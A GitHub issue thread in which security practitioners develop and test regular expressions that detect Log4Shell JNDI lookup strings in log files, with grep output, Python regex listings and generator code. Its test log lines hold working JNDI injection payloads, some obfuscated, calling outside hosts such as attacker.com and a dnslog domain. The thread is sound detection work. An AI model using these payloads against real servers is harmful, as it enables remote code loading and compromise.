Doing just the same using a RegEx #5
Comments
That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b |
I can't make it match on my log files with
Maybe egrep is somehow limited - missing back referencing e.g. Log line in one of the test files
|
Not yet tested on egrep/CLI in general. |
Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers). |
Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ¹ EDIT: Turns out the former won't work by default because |
Hi I just now managed to test the regex on the CLI. Current limitations:
➜ test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log
➜ test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4
➜ test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
Maybe I'll manage to work on a version that also covers the missing protocols: nis|iiop|corba|nds|http |
Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version. I wouldn't replace it as long as it can't detect the other protocols. |
Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo, log4shell-rex, to make it easier to extend later. Feel free to use it or reference it in your gist.
|
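A minimal sketch of how such a generator could work, assuming the goal is the one visible in the grep test above: match `${jndi:<protocol>:` with each character given literally or URL-encoded, in either case, and with up to 30 filler characters in between. This is not the log4shell-rex script; `char_pattern`, `keyword_pattern`, `build_regex` and `MAX_GAP` are hypothetical names chosen for illustration.

```python
import re

MAX_GAP = 30  # assumed upper bound on filler characters, as in the .{0,30} gaps above


def char_pattern(ch):
    """Match one character literally or as a %XX escape (both letter cases)."""
    codes = sorted({ord(ch.lower()), ord(ch.upper())})
    alternatives = [re.escape(ch)] + ["%{:02x}".format(c) for c in codes]
    return "(?:" + "|".join(alternatives) + ")"


def keyword_pattern(word, gap=MAX_GAP):
    """Match the characters of `word` in order, with up to `gap` fillers between them."""
    filler = ".{0,%d}" % gap
    return filler.join(char_pattern(c) for c in word)


def build_regex(protocols=("ldap", "rmi", "dns")):
    """Assemble the full pattern; extending coverage means adding a protocol name."""
    filler = ".{0,%d}" % MAX_GAP
    colon = char_pattern(":")
    protocol_group = "(?:" + "|".join(keyword_pattern(p) for p in protocols) + ")"
    pattern = (
        char_pattern("$") + char_pattern("{") + filler
        + keyword_pattern("jndi") + filler + colon + filler
        + protocol_group + filler + colon
    )
    # IGNORECASE covers mixed-case payloads and upper/lower hex digits in escapes.
    return re.compile(pattern, re.IGNORECASE)


LOG4SHELL_RE = build_regex()
print(bool(LOG4SHELL_RE.search("Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D")))
```

Generating the pattern keeps the per-character alternations consistent, so adding the missing protocols would only require extending the `protocols` tuple.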
You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):
You can see how my detections fare, and run your own examples against the I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing. |
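The "confidence score naïve Bayes style" idea can be sketched roughly as follows. The three patterns are taken from the list quoted later in this thread; every probability below is a made-up placeholder that would have to be estimated from your own data, and the independence assumption behind naive Bayes clearly does not hold for overlapping regexes, so treat the result as a ranking aid only. `DETECTIONS`, `PRIOR_MALICIOUS` and `score` are hypothetical names.

```python
import math
import re

# name: (regex, assumed P(hit | malicious), assumed P(hit | benign))
# The probabilities are illustrative placeholders, not measured values.
DETECTIONS = {
    "SIMPLE_RE": (re.compile(r"\$\{\s*jndi\s*:.*\}"), 0.60, 0.001),
    "NESTED_RE": (re.compile(r"\$\{.*\$\{.*\}.*\}"), 0.50, 0.01),
    "ANY_RE": (re.compile(r"\$\{.*\}"), 0.99, 0.05),
}
PRIOR_MALICIOUS = 0.01  # assumed share of malicious lines in the log


def score(line):
    """Combine all detections into one probability-like confidence value."""
    log_odds = math.log(PRIOR_MALICIOUS / (1 - PRIOR_MALICIOUS))
    for regex, p_mal, p_ben in DETECTIONS.values():
        if regex.search(line):
            log_odds += math.log(p_mal / p_ben)  # evidence from a hit
        else:
            log_odds += math.log((1 - p_mal) / (1 - p_ben))  # evidence from a miss
    return 1 / (1 + math.exp(-log_odds))


for sample in ("plain text", "${env:HOME}", "${jndi:ldap://addr}"):
    print(sample, round(score(sample), 3))
```

A broad detection such as ANY_RE contributes little on its own, while a hit on a narrow detection moves the score sharply, which mirrors the signal-to-noise trade-off described above.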
@karanlyons wondering if exploit is possible without any protocol given and without forward slash: e.g. Not yet sure about false positive rate |
https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:
https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:
So a contrived example would be, e.g., that there’s Also keep in mind that Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probable vectors at it. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment. But your best plan of action is just to upgrade or mitigate (rm ¹ EDIT: Again, because |
Thanks @karanlyons, I made some improvements to my RegEx and already get quite good coverage. |
I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:
>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False
>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:
>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print(f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)? |
Updated my regex |
The following RegEx is just the equivalent.
I don't know whether this still counts as a reasonable regular expression, but it's doable:
It matches the following strings case-insensitively, even if they are (partially) URL-encoded:
Example:
Improvement Idea for the Script:
To reduce the chance of false positives and improve performance a bit, you could require that the '$' sign at the start is immediately followed by a '{'.
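The effect of that suggestion can be illustrated with two deliberately simplified patterns. Neither is the regex proposed in this issue; `LOOSE`, `STRICT` and `GAP` are hypothetical stand-ins that differ only in whether filler characters are allowed between '$' and '{'.

```python
import re

GAP = ".{0,30}"  # assumed filler allowance, for illustration only

# Loose: anything (up to 30 characters) may sit between '$' and '{'.
LOOSE = re.compile(r"\$" + GAP + r"\{" + GAP + "jndi", re.IGNORECASE)
# Strict: '$' must be immediately followed by '{'.
STRICT = re.compile(r"\$\{" + GAP + "jndi", re.IGNORECASE)

benign = "price $5 for {item} in the jndi docs"
payload = "${jndi:ldap://addr}"

for name, regex in (("LOOSE", LOOSE), ("STRICT", STRICT)):
    print(name, bool(regex.search(benign)), bool(regex.search(payload)))
```

The strict form rejects the benign line while still matching the payload, and it gives the regex engine one fewer variable-length gap to backtrack over. It would, however, miss a payload whose '{' is URL-encoded unless that alternative is added explicitly.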